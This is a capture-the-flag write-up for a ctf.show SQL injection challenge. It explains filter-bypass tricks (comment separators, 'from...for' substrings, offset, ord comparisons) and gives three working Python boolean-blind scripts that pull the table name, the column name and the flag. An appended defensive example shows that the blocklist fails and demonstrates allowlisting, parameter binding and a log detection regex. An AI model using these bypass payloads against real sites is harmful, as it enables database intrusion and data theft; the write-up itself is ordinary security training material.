Problem description
The challenge hint says this is a SQL injection challenge.

Opening the challenge, we guess the injection point is the id parameter.
After some testing, we found that the challenge filters the union keyword, single quotes, commas and spaces.
Solution
1. With union filtered, union-based injection is out; we try boolean-based blind injection instead.
2. With commas filtered, we use mid(username from 1 for 1) in place of mid(username,1,1),
and limit 1 offset 1 in place of limit 1,1.
3. With spaces filtered, we use /**/ comments as the separator to bypass the filter.
4. With single quotes filtered, we use ord() to convert the character under test to its ASCII code and compare the numbers instead.
Below we write a Python script to run it.
Getting the table name
import requests

chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"  # candidate characters to test
url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"  # challenge address

for n in range(0, 2):  # brute-force the first two tables
    table_name = ''
    for i in range(1, 10):  # positions 1 to 9 of the table name (we guess the name is shorter than ten characters)
        for char in chars:  # test each candidate character
            params = {
                "id":
                "-1/**/or/**/ord(mid((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/(database())/**/limit/**/1/**/offset/**/" + str(n) + ")/**/from/**/" + str(i) + "/**/for/**/1))/**/in/**/(" + str(ord(char)) + ")"
            }
            r = requests.get(url=url, params=params)
            # print(r.request.url)
            if "If" in r.text:  # the "true" page contains the string "If"
                table_name += char
                print(table_name)
                break  # this position is resolved; move on to the next one
Getting the column names
import requests

chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"  # candidate characters to test
url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"  # challenge address

for n in range(0, 1):  # only the first column of the flag table
    column_name = ''
    for i in range(1, 10):  # positions 1 to 9 of the column name
        for char in chars:  # test each candidate character
            params = {
                "id":
                "-1/**/or/**/ord(mid((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name/**/in/**/(0x666c6167)/**/limit/**/1/**/offset/**/" + str(n) + ")/**/from/**/" + str(i) + "/**/for/**/1))/**/in/**/(" + str(ord(char)) + ")"
            }  # 0x666c6167 is the hex encoding of the string "flag", so no quotes are needed
            r = requests.get(url=url, params=params)
            # print(r.request.url)
            if "If" in r.text:
                column_name += char
                print(column_name)
                break
Getting the column value
import requests

chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"  # candidate characters to test
url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"  # challenge address

for n in range(0, 1):  # only the first row of the flag table
    flag_value = ''
    for i in range(1, 50):  # positions 1 to 49 of the flag value
        for char in chars:  # test each candidate character
            params = {
                "id":
                "-1/**/or/**/ord(mid((select/**/flag/**/from/**/flag/**/limit/**/1/**/offset/**/" + str(n) + ")/**/from/**/" + str(i) + "/**/for/**/1))/**/in/**/(" + str(ord(char)) + ")"
            }
            r = requests.get(url=url, params=params)
            # print(r.request.url)
            if "If" in r.text:
                flag_value += char
                print(flag_value)
                break
Getting the flag
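From the defender's side, the lesson of this challenge is that a keyword blocklist is not a fix. The added example below (not part of the original write-up) reproduces the challenge's four-item blocklist, shows that a payload of the shape used above passes it, and contrasts that with two things that actually stop it: a strict integer allowlist on id and parameter binding. It also includes a small log detector for the comment-stuffing pattern; the table, column, log lines and the SQLite database are constructed for the demo.

```python
import re
import sqlite3

# The challenge's blocklist as described in the write-up: union, single quote, comma, space.
BLOCKED = ("union", "'", ",", " ")

# Payload of the same shape as the write-up's, constructed here against a dummy table t / column name.
PAYLOAD = ("-1/**/or/**/ord(mid((select/**/name/**/from/**/t/**/limit/**/1/**/offset/**/0)"
           "/**/from/**/1/**/for/**/1))/**/in/**/(97)")

def blocklist_allows(value: str) -> bool:
    """True when the challenge-style blocklist lets the value through (it does for PAYLOAD)."""
    low = value.lower()
    return not any(token in low for token in BLOCKED)

def allowlist_id(value: str):
    """Allowlist instead: an id must be a plain decimal integer, everything else is rejected."""
    return int(value) if re.fullmatch(r"[0-9]{1,10}", value) else None

def lookup_parameterized(conn, raw_id: str):
    """Parameter binding: the value is data, never SQL text, so the payload matches no row."""
    return conn.execute("SELECT name FROM t WHERE id = ?", (raw_id,)).fetchall()

# Detection side: the bypass leaves distinctive tokens in the query string.
SUSPICIOUS = re.compile(r"/\*\*/|information_schema|\bord\(mid\(", re.I)

def flag_requests(log_lines):
    """Return the access-log lines whose request shows the comment-stuffed injection pattern."""
    return [line for line in log_lines if SUSPICIOUS.search(line)]

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.php?id=3 HTTP/1.1" 200',
    '10.0.0.9 - - "GET /index.php?id=-1/**/or/**/ord(mid((select/**/table_name/**/from/**/information_schema.tables HTTP/1.1" 200',
]

def demo():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO t VALUES (1, 'alice')")
    return {
        "blocklist_passes_payload": blocklist_allows(PAYLOAD),      # True: the filter is bypassed
        "allowlist_rejects_payload": allowlist_id(PAYLOAD) is None,  # True: non-integer id refused
        "parameterized_rows": lookup_parameterized(conn, PAYLOAD),  # []: payload is just a string
        "flagged": len(flag_requests(SAMPLE_LOG)),                   # 1: the injected request
    }

if __name__ == "__main__":
    print(demo())
```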

Daily sharing from a CTF newbie; comments from the experts are welcome.
Please credit the source when reposting. Original link: https://www.uj5u.com/qita/327870.html
